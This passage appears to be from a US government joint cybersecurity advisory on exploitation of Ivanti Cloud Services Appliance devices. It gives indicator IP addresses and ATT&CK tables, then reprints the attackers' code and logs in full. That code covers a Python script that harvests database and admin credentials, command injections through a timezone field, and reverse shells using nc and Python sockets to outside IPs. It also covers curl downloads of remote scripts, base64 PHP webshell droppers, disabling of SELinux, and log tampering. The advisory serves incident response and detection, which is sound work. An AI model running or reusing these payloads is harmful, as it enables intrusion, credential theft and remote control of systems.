| Ipv4 | 185.220.69[.]83 | |
| Ipv4 | 185.199.103[.]196 | |
| Ipv4 | 188.172.229[.]15 | |
| Ipv4 | 155.138.215[.]144 | |
| Ipv4 | 64.176.49[.]160 | |
| Ipv4 | 185.40.4[.]38 | |
| Ipv4 | 216.131[.]75.53 | |
| Ipv4 | 185.40.4[.]95 |
See Table 4 to Table 13 for all referenced threat actor tactics and techniques in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.
| Technique Title | ID | Use |
|---|---|---|
| Active Scanning: Vulnerability Scanning | T1595.002 | Threat actors performed reconnaissance by using Obelisk and GoGo to scan for vulnerabilities. |
| Technique Title | ID | Use |
|---|---|---|
| Exploit Public-Facing Application | T1190 | Threat actors leveraged weaknesses in applications that are not properly handled to compromise network device protocols, perform SQL injections, and generally exploit applications. |
| Technique Title | ID | Use |
|---|---|---|
| Command and Scripting Interpreter | T1059 | Threat actors abused command and script interpreters to execute commands, scripts, or binaries. |
| Technique Title | ID | Use |
|---|---|---|
| Modify Authentication Process | T1556 | Threat actors executed an authentication bypass by exploiting the authentication mechanisms of a device to gain access to organizations’ networks. |
| Server Software Component: Web Shell | T1505.003 | Threat actors executed code to implant webshells for persistence. |
| Technique Title | ID | Use |
|---|---|---|
| Exploitation for Privilege Escalation | T1068 | Threat actors leveraged weaknesses to gain access via an outdated, vulnerable version of a server. |
| Technique Title | ID | Use |
|---|---|---|
| Hide Artifacts: Hidden Users | T1564.002 | Threat actors acted as a hidden user to disguise their presence on a system. |
| Deobfuscate/Decode Files or Information | T1140 | Threat actors decrypted credentials prior to exfiltration by leveraging native tools located in the extracted backup file. |
| Abuse Elevation Control Mechanism: Sudo and Sudo Caching | T1548.003 | Threat actors used sudo commands to disable vulnerabilities, modify and remove webshells, and remove evidence of exploitation. |
| Technique Title | ID | Use |
|---|---|---|
| Unsecured Credentials: Credentials in Files | T1552.001 | Threat actors harvested encrypted admin credentials to gain further access. |
| Technique Title | ID | Use |
|---|---|---|
| Exploitation of Remove Services | T1210 | Threat actors exploited CSAs via remote services to gain access to an organization’s networks by leveraging programming errors, EOL systems, and operating systems. |
| Technique Title | ID | Use |
|---|---|---|
| Remote Access Software | T1219 | Threat actors attempted to remotely authenticate into a victim’s network and execute arbitrary commands on the appliance. |
| Application Layer: Web Protocol | T1071.001 | Threat actors used tools such as GET or POST requests to acquire session and CSRF tokens. |
| Technique Title | ID | Use |
|---|---|---|
| Exfiltration | TA0010 | Threat actors exfiltrated encrypted admin credentials or other encrypted data for future use. |
If compromise is detected, the authoring agencies recommend that organizations:
CISA and FBI recommend organizations:
In addition to applying mitigations, CISA and FBI recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. CISA and FBI recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.
To get started:
CISA and FBI recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.
Organizations are encouraged to report suspicious or criminal activity related to information in this advisory to:
The information in this report is being provided “as is” for informational purposes only. CISA and FBI do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA and FBI.
January 22, 2025: Initial version.
| { import os, re, base64, time os.chdir(“/tmp”) d = “/backups” def set_msg(p, t=”, m=”): if t and m: msg = ‘AA{}:{}BB’.format(t, base64.b64encode(m.encode()).decode()) else: msg = ” os.system(”’export PGPASSWORD={};echo “update user_info set organization='{}’ where username=’admin'”|psql -d brokerdb -U gsbadmin”’.format(p, msg)) try: r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime) except: r = None with open(“/opt/landesk/broker/broker.conf”) as f: dbpwd = re.findall(“PGSQL_PW=(.*)”, f.read())[0] if r: p = os.popen(“export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=’admin” | psql -d brokerdb -U gsbadmin -h localhost”.format(dbpwd)).read().split(“n”)[-4].strip().split(‘:’) os.system(“tar zxvf {}”.format(r)) while True: for f in os.listdir(‘.’): if re.match(“phpw{6}”, f): os.chmod(f, 0o777) m = os.popen(“./{} {} {} {} root/.certs/{}.key {}”.format(f, p[4], p[5], p[6], p[1], p[1])).read().strip() if m: set_msg(dbpwd, “PASSWORD”, m) time.sleep(30) set_msg(dbpwd) exit() else: set_msg(dbpwd, ‘ERROR’, ‘NO BACKUP’) } |
| { import os, re, base64, time os.chdir(“/tmp”) d = “/backups” def set_msg(p, t=”, m=”): if t and m: msg = ‘AA{}:{}BB’.format(t, base64.b64encode(m.encode()).decode()) else: msg = ” os.system(”’export PGPASSWORD={};echo “update user_info set organization='{}’ where username=’service'”|psql -d brokerdb -U gsbadmin”’.format(p, msg)) try: r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime) except: r = None with open(“/opt/landesk/broker/broker.conf”) as f: dbpwd = re.findall(“PGSQL_PW=(.*)”, f.read())[0] if r: p = os.popen(“export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=’service” | psql -d brokerdb -U gsbadmin -h localhost”.format(dbpwd)).read().split(“n”)[-4].strip().split(‘:’) os.system(“tar zxvf {}”.format(r)) while True: for f in os.listdir(‘.’): if re.match(“phpw{6}”, f): os.chmod(f, 0o777) m = os.popen(“./{} {} {} {} root/.certs/{}.key {}”.format(f, p[4], p[5], p[6], p[1], p[1])).read().strip() if m: set_msg(dbpwd, “PASSWORD”, m) time.sleep(30) set_msg(dbpwd) exit() else: set_msg(dbpwd, ‘ERROR’, ‘NO BACKUP’) } |
| import os, re, base64, time os.chdir(“/tmp”) d = “/backups” def set_msg(p, t=”, m=”): if t and m: msg = ‘AA{}:{}BB’.format(t, base64.b64encode(m.encode()).decode()) else: msg = ” os.system(”’export PGPASSWORD={};echo “update user_info set organization='{}’ where username=’admin'”|psql -d brokerdb -U gsbadmin”’.format(p, msg)) try: r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime) except: r = None with open(“/opt/landesk/broker/broker.conf”) as f: dbpwd = re.findall(“PGSQL_PW=(.*)”, f.read())[0] if r: p = os.popen(“export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=’admin’ | psql -d brokerdb -U gsbadmin -h localhost”.format(dbpwd)).read().split(“n”)[-4].strip().split(‘:’) os.system(“tar zxvf {}”.format(r)) while True: for f in os.listdir(‘.’): if re.match(“phpw{6}”, f): os.chmod(f, 0o777) m = os.popen(“./{} {} {} {} root/.certs/{}.key {}”.format(f, p[4], p[5], p[6], p[1], p[1])).read().strip() if m: set_msg(dbpwd, “PASSWORD”, m) time.sleep(30) set_msg(dbpwd) exit() else: set_msg(dbpwd, ‘ERROR’, ‘NO BACKUP’) |
| import os, re, base64, time os.chdir(“/tmp”) d = “/backups” def set_msg(p, t=”, m=”): if t and m: msg = ‘AA{}:{}BB’.format(t, base64.b64encode(m.encode()).decode()) else: msg = ” os.system(”’export PGPASSWORD={};echo “update user_info set organization='{}’ where username=’admin'”|psql -d brokerdb -U gsbadmin”’.format(p, msg)) try: r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime) except: r = None with open(“/opt/landesk/broker/broker.conf”) as f: dbpwd = re.findall(“PGSQL_PW=(.*)”, f.read())[0] if r: p = os.popen(“export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=’admin’ | psql -d brokerdb -U gsbadmin -h localhost”.format(dbpwd)).read().split(“n”)[-4].strip().split(‘:’) os.system(“tar zxvf {}”.format(r)) while True: for f in os.listdir(‘.’): if re.match(“phpw{6}”, f): os.chmod(f, 0o777) m = os.popen(“./{} {} {} {} root/.certs/{}.key {}”.format(f, p[4], p[5], p[6], p[1], p[1])).read().strip() if m: set_msg(dbpwd, “PASSWORD”, m) time.sleep(30) set_msg(dbpwd) exit() else: set_msg(dbpwd, ‘ERROR’, ‘NO BACKUP’) |
|
{ with open(“/opt/landesk/broker/broker.conf”) as f: p = os.popen(“export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=’admin’ | psql -d brokerdb -U gsbadmin -h localhost”.format(dbpwd)).read().split(“n”)[-4].strip() |
|
{ def set_msg(p, t=”, m=”): os.chdir(“/tmp”) |
| { import os, re, base64, time os.chdir(“/tmp”) d = “/backups” def set_msg(p, t=”, m=”): if t and m: msg = ‘AA{}:{}BB’.format(t, base64.b64encode(m.encode()).decode()) else: msg = ” os.system(”’export PGPASSWORD={};echo “update user_info set organization='{}’ where username=’admin'”|psql -d brokerdb -U gsbadmin”’.format(p, msg)) try: r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime) except: r = None with open(“/opt/landesk/broker/broker.conf”) as f: dbpwd = re.findall(“PGSQL_PW=(.*)”, f.read())[0] os.system(”’export PGPASSWORD={};echo “delete from user_info where runas=’Nobody'”|psql -d brokerdb -U gsbadmin”’.format(dbpwd)) if r: p = os.popen(“export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=’admin’ | psql -d brokerdb -U gsbadmin -h localhost”.format(dbpwd)).read().split(“n”)[-4].strip().split(‘:’) os.system(“tar zxvf {}”.format(r)) while True: for f in os.listdir(‘.’): if re.match(“phpw{6}”, f): os.chmod(f, 0o777) m = os.popen(“./{} {} {} {} root/.certs/{}.key {}”.format(f, p[4], p[5], p[6], p[1], p[1])).read().strip() if m: set_msg(dbpwd, “PASSWORD”, m) time.sleep(30) set_msg(dbpwd) exit() else: set_msg(dbpwd, ‘ERROR’, ‘NO BACKUP’) } |
| { Sep 5 01:09:59 REDACTED gsb[996]: /etc/php.ini rewritten with new timezone: ‘;export PGPASSWORD=`cat /opt/landesk/broker/broker.conf | grep PGSQL_PW | cut -d ‘=’ -f2-`;echo “update user_info set organization=’||/usr/bin/echo import os, re, base64, time os.chdir(“/tmp”) d = “/backups” def set_msg(p, t=”, m=”): if t and m: msg = ‘AA{}:{}BB’.format(t, base64.b64encode(m.encode()).decode()) else: msg = ” os.system(”’export PGPASSWORD={};echo “update user_info set organization='{}’ where username=’admin'”|psql -d brokerdb -U gsbadmin”’.format(p, msg)) try: r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime) except: r = None with open(“/opt/landesk/broker/broker.conf”) as f: dbpwd = re.findall(“PGSQL_PW=(.*)”, f.read ())[0] if r: p = os.popen(“export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=’admin’ | psql -d brokerdb -U gsbadmin -h localhost”.format(dbpwd)).read().split(“n”)[-4].strip().split(‘:’) os.system(“tar zxvf {}”.format(r)) while True: for f in os.listdir(‘.’): if re.match(“phpw{6}”, f): os.chmod(f, 0o777) m = os.popen(“./{} {} {} {} root/.certs/{}.key {}”.format(f, p[4], p[5], p[6], p[1], p[1])).read().strip() if m: set_msg(dbpwd, “PASSWORD”, m) time.sleep(30) set_msg(dbpwd) exit() else: set_msg(dbpwd, ‘ERROR’, ‘NO BACKUP’) | /usr/bin/base64 -d | python||’ where username=’admin'”|psql -d brokerdb -U gsbadmin;’ (1) } |
| { Sep 5 01:47:01 REDACTED gsb[2599]: /etc/php.ini rewritten with new timezone: ‘;/usr/bin/echo import os, re, base64, time os.chdir(“/tmp”) d = “/backups” def set_msg(p, t=”, m=”): if t and m: msg = ‘AA{}:{}BB’.format(t, base64.b64encode(m.encode()).decode()) else: msg = ” os.system(”’export PGPASSWORD={};echo “update user_info set organization='{}’ where username=’admin'”|psql -d brokerdb -U gsbadmin”’.format(p, msg)) try: r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime) except: r = None with open(“/opt/landesk/broker/broker.conf”) as f: dbpwd = re.findall(“PGSQL_PW=(.*)”, f.read ())[0] if r: p = os.popen(“export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=’admin’ | psql -d brokerdb -U gsbadmin -h localhost”.format(dbpwd)).read().split(“n”)[-4].strip().split(‘:’) os.system(“tar zxvf {}”.format(r)) while True: for f in os.listdir(‘.’): if re.match(“phpw{6}”, f): os.chmod(f, 0o777) m = os.popen(“./{} {} {} {} root/.certs/{}.key {}”.format(f, p[4], p[5], p[6], p[1], p[1])).read().strip() if m: set_msg(dbpwd, “PASSWORD”, m) time.sleep(30) set_msg(dbpwd) exit() else: set_msg(dbpwd, ‘ERROR’, ‘NO BACKUP’) | /usr/bin/base64 -d | python;’ (1) } |
| { Sep 5 02:14:08 REDACTED gsb[1273]: /etc/php.ini rewritten with new timezone: ‘;export PGPASSWORD=`cat /opt/landesk/broker/broker.conf | grep PGSQL_PW | cut -d ‘=’ -f2-`;echo “update user_info set organization=’||/usr/bin/echo import os, re, base64, time os.chdir(“/tmp”) d = “/backups” def set_msg(p, t=”, m=”): if t and m: msg = ‘AA{}:{}BB’.format(t, base64.b64encode(m.encode()).decode()) else: msg = ” os.system(”’export PGPASSWORD={};echo “update user_info set organization='{}’ where username=’admin'”|psql -d brokerdb -U gsbadmin”’.format(p, msg)) try: r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime) except: r = None with open(“/opt/landesk/broker/broker.conf”) as f: dbpwd = re.findall(“PGSQL_PW=(.*)”, f.read ())[0] if r: p = os.popen(“export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=’admin’ | psql -d brokerdb -U gsbadmin -h localhost”.format(dbpwd)).read().split(“n”)[-4].strip().split(‘:’) os.system(“tar zxvf {}”.format(r)) while True: for f in os.listdir(‘.’): if re.match(“phpw{6}”, f): os.chmod(f, 0o777) m = os.popen(“./{} {} {} {} root/.certs/{}.key {}”.format(f, p[4], p[5], p[6], p[1], p[1])).read().strip() if m: set_msg(dbpwd, “PASSWORD”, m) time.sleep(30) set_msg(dbpwd) exit() else: set_msg(dbpwd, ‘ERROR’, ‘NO BACKUP’) | /usr/bin/base64 -d | python||’ where username=’admin'”|psql -d brokerdb -U gsbadmin;’ (1) } |
| { Sep 5 22:22:06 REDACTED gsb[9367]: /etc/php.ini rewritten with new timezone: ‘;export PGPASSWORD=`cat /opt/landesk/broker/broker.conf | grep PGSQL_PW | cut -d ‘=’ -f2-`;echo “update user_info set organization=’||/usr/bin/echo import os, re, base64, time os.chdir(“/tmp”) d = “/backups” def set_msg(p, t=”, m=”): if t and m: msg = ‘AA{}:{}BB’.format(t, base64.b64encode(m.encode()).decode()) else: msg = ” os.system(”’export PGPASSWORD={};echo “update user_info set organization='{}’ where username=’admin'”|psql -d brokerdb -U gsbadmin”’.format(p, msg)) try: r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime) except: r = None with open(“/opt/landesk/broker/broker.conf”) as f: dbpwd = re.findall(“PGSQL_PW=(.*)”, f.read ())[0] if r: p = os.popen(“export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=’admin’ | psql -d brokerdb -U gsbadmin -h localhost”.format(dbpwd)).read().split(“n”)[-4].strip().split(‘:’) os.system(“tar zxvf {}”.format(r)) while True: for f in os.listdir(‘.’): if re.match(“phpw{6}”, f): os.chmod(f, 0o777) m = os.popen(“./{} {} {} {} root/.certs/{}.key {}”.format(f, p[4], p[5], p[6], p[1], p[1])).read().strip() if m: set_msg(dbpwd, “PASSWORD”, m) time.sleep(30) set_msg(dbpwd) exit() else: set_msg(dbpwd, ‘ERROR’, ‘NO BACKUP’) | /usr/bin/base64 -d | python||’ where username=’admin'”|psql -d brokerdb -U gsbadmin;’ (1) } |
| { Sep 6 02:39:11 REDACTED gsb[21266]: /etc/php.ini rewritten with new timezone: ‘;/usr/bin/echo import os, re, base64, time os.chdir(“/tmp”) d = “/backups” def set_msg(p, t=”, m=”): if t and m: msg = ‘AA{}:{}BB’.format(t, base64.b64encode(m.encode()).decode()) else: msg = ” os.system(”’export PGPASSWORD={};echo “update user_info set organization='{}’ where username=’admin'”|psql -d brokerdb -U gsbadmin”’.format(p, msg)) try: r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime) except: r = None with open(“/opt/landesk/broker/broker.conf”) as f: dbpwd = re.findall(“PGSQL_PW=(.*)”, f.read ())[0] if r: p = os.popen(“export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=’admin’ | psql -d brokerdb -U gsbadmin -h localhost”.format(dbpwd)).read().split(“n”)[-4].strip().split(‘:’) os.system(“tar zxvf {}”.format(r)) while True: for f in os.listdir(‘.’): if re.match(“phpw{6}”, f): os.chmod(f, 0o777) m = os.popen(“./{} {} {} {} root/.certs/{}.key {}”.format(f, p[4], p[5], p[6], p[1], p[1])).read().strip() if m: set_msg(dbpwd, “PASSWORD”, m) time.sleep(30) set_msg(dbpwd) exit() else: set_msg(dbpwd, ‘ERROR’, ‘NO BACKUP’) | /usr/bin/base64 -d | python;’ (1) } |
| { Sep 6 03:03:44 REDACTED gsb[11427]: /etc/php.ini rewritten with new timezone: ‘;bash /tmp/Xa27efd2.tmp;’ (1) } |
| { Sep 8 05:18:35 REDACTED gsb[5132]: /etc/php.ini rewritten with new timezone: ‘;/sbin/backuptool –backup;’ (1) } |
| { Sep 8 05:19:34 REDACTED gsb[5325]: /etc/php.ini rewritten with new timezone: ‘;/usr/bin/echo import os, re, base64, time os.chdir(“/tmp”) d = “/backups” def set_msg(p, t=”, m=”): if t and m: msg = ‘AA{}:{}BB’.format(t, base64.b64encode(m.encode()).decode()) else: msg = ” os.system(”’export PGPASSWORD={};echo “update user_info set organization='{}’ where username=’admin'”|psql -d brokerdb -U gsbadmin”’.format(p, msg)) try: r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime) except: r = None with open(“/opt/landesk/broker/broker.conf”) as f: dbpwd = re.findall(“PGSQL_PW=(.*)”, f.read ())[0] if r: p = os.popen(“export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=’admin’ | psql -d brokerdb -U gsbadmin -h localhost”.format(dbpwd)).read().split(“n”)[-4].strip().split(‘:’) os.system(“tar zxvf {}”.format(r)) while True: for f in os.listdir(‘.’): if re.match(“phpw{6}”, f): os.chmod(f, 0o777) m = os.popen(“./{} {} {} {} root/.certs/{}.key {}”.format(f, p[4], p[5], p[6], p[1], p[1])).read().strip() if m: set_msg(dbpwd, “PASSWORD”, m) time.sleep(30) set_msg(dbpwd) exit() else: set_msg(dbpwd, ‘ERROR’, ‘NO BACKUP’) | /usr/bin/base64 -d | python;’ (1) } |
| { Sep 8 10:37:35 REDACTED gsb[6196]: /etc/php.ini rewritten with new timezone: ‘;nc REDACTED 80 -ssl -e /bin/bash;’ (1) } |
| { Sep 8 10:40:38 REDACTED gsb[8758]: /etc/php.ini rewritten with new timezone: ‘;curl https://gggg.oyr2ohrm.eyes.sh /;’ (1) } |
| { Sep 8 10:41:35 REDACTED gsb[7475]: /etc/php.ini rewritten with new timezone: ‘;curl 98.98.54.209/a.sh -o /dev/shm/a.sh ;’ (1) } |
| { Sep 8 13:10:37 REDACTED gsb[22555]: /etc/php.ini rewritten with new timezone: ‘;nc REDACTED 80 –ssl -e /bin/bash;’ (1) } |
| { Sep 8 13:21:06 REDACTED gsb[24954]: /etc/php.ini rewritten with new timezone: ‘;nc REDACTED 80 –ssl -e /bin/bash;’ (1) } |
| { Sep 8 20:23:14 REDACTED gsb[1899]: /etc/php.ini rewritten with new timezone: ‘;export PGPASSWORD=`cat /opt/landesk/broker/broker.conf | grep PGSQL_PW | cut -d ‘=’ -f2-`;echo “update user_info set organization=’||/usr/bin/echo import os, re, base64, time os.chdir(“/tmp”) d = “/backups” def set_msg(p, t=”, m=”): if t and m: msg = ‘AA{}:{}BB’.format(t, base64.b64encode(m.encode()).decode()) else: msg = ” os.system(”’export PGPASSWORD={};echo “update user_info set organization='{}’ where username=’admin'”|psql -d brokerdb -U gsbadmin”’.format(p, msg)) try: r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime) except: r = None with open(“/opt/landesk/broker/broker.conf”) as f: dbpwd = re.findall(“PGSQL_PW=(.*)”, f.read ())[0] if r: p = os.popen(“export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=’admin’ | psql -d brokerdb -U gsbadmin -h localhost”.format(dbpwd)).read().split(“n”)[-4].strip().split(‘:’) os.system(“tar zxvf {}”.format(r)) while True: for f in os.listdir(‘.’): if re.match(“phpw{6}”, f): os.chmod(f, 0o777) m = os.popen(“./{} {} {} {} root/.certs/{}.key {}”.format(f, p[4], p[5], p[6], p[1], p[1])).read().strip() if m: set_msg(dbpwd, “PASSWORD”, m) time.sleep(30) set_msg(dbpwd) exit() else: set_msg(dbpwd, ‘ERROR’, ‘NO BACKUP’) | /usr/bin/base64 -d | python||’ where username=’admin'”|psql -d brokerdb -U gsbadmin;’ (1) } |
| { Sep 10 04:36:30 REDACTED gsb[16012]: /etc/php.ini rewritten with new timezone: ‘;/usr/bin/echo python -c ‘import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“45.33.101.53 “,443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(“/bin/sh”)’== | /usr/bin/base64 -d | /bin/bash;’ (1) } |
| { Sep 10 11:48:32 csa gsb[6829]: /etc/php.ini rewritten with new timezone: ‘;/bin/ python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“156.234.193.18”,44345));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/bash”,”-i”]);’;’ (1) } |
| { Sep 10 05:33:42 REDACTED gsb[17292]: /etc/php.ini rewritten with new timezone: ‘;/usr/bin/echo import os, re, time os.chdir(“/tmp”) d = “/backups/backup-09-01-2024_010101.tar.gz” with open(“/opt/landesk/broker/broker.conf”) as f: dbpwd = re.findall(“PGSQL_PW=(.*)”, f.read ())[0] if os.path.exists(d): os.system(“tar zxf {}”.format(d)) pwd = os.popen(“export PGPASSWORD={};echo SELECT username,passwd FROM user_info | psql -d brokerdb -U gsbadmin -h localhost”.format(dbpwd)).read().strip() p = pwd.split(‘:’) k = os.popen(“cat root/.certs/{}.0”.format(p[1])).read().strip() os.system(”’export PGPASSWORD={};echo “INSERT INTO blockedcerts (blockedcerts_idn, core, hash, description, created) VALUES (1, ‘{}’, ‘1’, ‘{}’, ‘2024-03-13 05:10:16.926012′)”|psql -d brokerdb -U gsbadmin”’.format(dbpwd, k[0:200], k[200:700])) os.system(”’export PGPASSWORD={};echo “INSERT INTO blockedcerts (blockedcerts_idn, core, hash, description, created) VALUES (2, ‘{}’, ‘2’, ‘{}’, ‘2024-03-13 05:10:16.926012′)”|psql -d brokerdb -U gsbadmin”’.format(dbpwd, k[700:900], k[900:])) os.system(”’export PGPASSWORD={};echo “INSERT INTO blockedcerts (blockedcerts_idn, core, hash, description, created) VALUES (3, ‘{}’, ‘3’, ‘{}’, ‘2024-03-13 05:10:16.926012′)”|psql -d brokerdb -U gsbadmin”’.format(dbpwd, pwd[0:200], pwd[200:700])) time.sleep(60) os.system(”’export PGPASSWORD={};echo “DELETE FROM blockedcerts”|psql -d brokerdb -U gsbadmin”’.format(dbpwd)) os.system(“rm -rdf *;rm -rf *”)== | /usr/bin/base64 -d | python;’ (1) } |
See Table 14 for a list of known sudo commands executed by the threat actors.
| Command | Use |
|---|---|
| sudo: nobody : user NOT in sudoers ; TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/opt/landesk/ldms/LDClient/ldpclient -i ;export PGPASSWORD=`cat /opt/landesk/broker/broker.conf | grep PGSQL_PW | cut -d ‘=’ -f2-`;echo “update user_info set organization=’||/usr/bin/echo aW1wb3J0IG9zLCByZSwgYmFzZTY0LCB0aW1lCm9zLmNoZGlyKCIvdG1wIikKZCA9ICIvYmFja3VwcyIKZGVmIHNldF9tc2cocCwgdD0nJywgbT0nJyk6CiAgICBpZiB0IGFuZCBtOgogICAgICAgIG1zZyA9ICdBQXt9Ont9QkInLmZvcm1hdCh0LCBiYXNlNjQuYjY0ZW5jb2RlKG0uZW5jb2RlKCkpLmRlY29kZSgpKQogICAgZWxzZToKICAgICAgICBtc2cgPSAnJwogICAgb3Muc3lzdGVtKCcnJ2V4cG9ydCBQR1BBU1NXT1JEPXt9O2VjaG8gInVwZGF0ZSB1c2VyX2luZm8gc2V0IG9yZ2FuaXphdGlvbj0ne30nIHdoZXJlIHVzZXJuYW1lPSdhZG1pbicifHBzcWwgLWQgYnJva2VyZGIgLVUgZ3NiYWRtaW4nJycuZm9ybWF0KHAsIG1zZykpCnRyeToKICAgIHIgPSBtYXgoW29zLnBhdGguam9pbihkLCBmKSBmb3IgZiBpbiBvcy5saXN0ZGlyKGQpIGlmIG9zLnBhdGguaXNmaWxlKG9zLnBhdGguam9pbihkLCBmKSldLCBrZXk9b3MucGF0aC5nZXRtdGltZSkKZXhjZXB0OgogICAgciA9IE5vbmUKd2l0aCBvcGVuKCIvb3B0L2xhbmRlc2svYnJva2VyL2Jyb2tlci5jb25mIikgYXMgZjoKICAgIGRicHdkID0gcmUuZmluZGFsbCgiUEdTUUxfUFc9KC4qKSIsIGYucmVhZCgpKVswXQppZiByOgogICAgcCA9IG9zLnBvcGVuKCJleHBvcnQgUEdQQVNTV09SRD17fTtlY2hvIFNFTEVDVCBwYXNzd2QgRlJPTSB1c2VyX2luZm8gV0hFUkUgdXNlcm5hbWU9XFwnYWRtaW5cXCcgfCBwc3FsIC1kIGJyb2tlcmRiIC1VIGdzYmFkbWluIC1oIGxvY2FsaG9zdCIuZm9ybWF0KGRicHdkKSkucmVhZCgpLnNwbGl0KCJcbiIpWy00XS5zdHJpcCgpLnNwbGl0KCc6JykKICAgIG9zLnN5c3RlbSgidGFyIHp4dmYge30iLmZvcm1hdChyKSkKICAgIHdoaWxlIFRydWU6CiAgICAgICAgZm9yIGYgaW4gb3MubGlzdGRpcignLicpOgogICAgICAgICAgICBpZiByZS5tYXRjaCgicGhwXHd7Nn0iLCBmKToKICAgICAgICAgICAgICAgIG9zLmNobW9kKGYsIDBvNzc3KQogICAgICAgICAgICAgICAgbSA9IG9zLnBvcGVuKCIuL3t9IHt9IHt9IHt9IHJvb3QvLmNlcnRzL3t9LmtleSB7fSIuZm9ybWF0KGYsIHBbNF0sIHBbNV0sIHBbNl0sIHBbMV0sIHBbMV0pKS5yZWFkKCkuc3RyaXAoKQogICAgICAgICAgICAgICAgaWYgbToKICAgICAgICAgICAgICAgICAgICBzZXRfbXNnKGRicHdkLCAiUEFTU1dPUkQiLCBtKQogICAgICAgICAgICAgICAgICAgIHRpbWUuc2xlZXAoMjQwKQogICAgICAgICAgICAgICAgICAgIHNldF9tc2coZGJwd2QpCiAgICAgICAgICAgICAgICAgICAgZXhpdCgpCmVsc2U6CiAgICBzZXRfbXNnKGRicHdkLCAnRVJST1InLCAnTk8gQkFDS1VQJykKICAgIAogICAgCg== | /usr/bin/base64 -d | python||’ where username=’admin'”|psql -d brokerdb -U gsbadmin; |
Updates the “organization” field of the “admin” account in the PGSQL database with python script decoded from base64. The python script decompresses the latest backup of the PGSQL database and extracts the password for the gsbadmin account to access the database. |
| nobody : user NOT in sudoers ; TTY=unknown ; PWD=/usr/bin ; USER=root ; COMMAND=/sbin/setenforce 0 | Temporarily disables SELinux. |
| sudo: admin : TTY=unknown ; PWD=/tmp ; USER=root ; COMMAND=/bin/sh -c echo REDACTED_BASE64_PASSWORD | base64 >/opt/landesk/broker/webroot/gsb/site.cnf | Exfiltrates credentials and places them in a site.cnf webfile. |
| sudo: admin : TTY=unknown ; PWD=/tmp ; USER=root ; COMMAND=/bin/sh -c echo PD9waHAgZXZhbCgkX1BPU1RbImNiNzg2OGM0NjA zNTQ4NTdiNzE5MjA0ZTI3NjZlZGJlIl0pOw== | base64 -d >/opt/landesk/broker/webroot/gsb/view.php | Creates a webshell at view.php. |
|
sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/subin/tripwire –update ;/usr/bin/echo ZWNobyAiPD9waHAgc3lzdGVtKCcvYmluL3N1ZG8gJy4Gq FwkX1JFUVVFU1RbJ2EnXSk7IiA+IC9vcHQvbGFuZGVzay9icm 9rZXIvd2Vicm9vdC9nc2IvaGVscC5waHA= | /usr/bin/base64 -d | /bin/bash; |
Creates a webshell at help.php. |
| sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;sed -i ‘s/setPhpTimeZone($TIMEZONE)/// setPhpTimeZone()/g’ /opt/landesk/broker/webroot/gsb/DateTimeTab.php | Comments out the function setPhpTimeZone in DateTimeTab.php that logs the full exploit command. |
| sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;sed -i ‘s/setSystemTimeZone( $TIMEZONE )/// setSystemTimeZone( $TIMEZONE )/g’ /opt/landesk/broker/webroot/gsb/DateTimeTab.php | Comments out the vulnerable function setSystemTimeZone in DateTimeTab.php. |
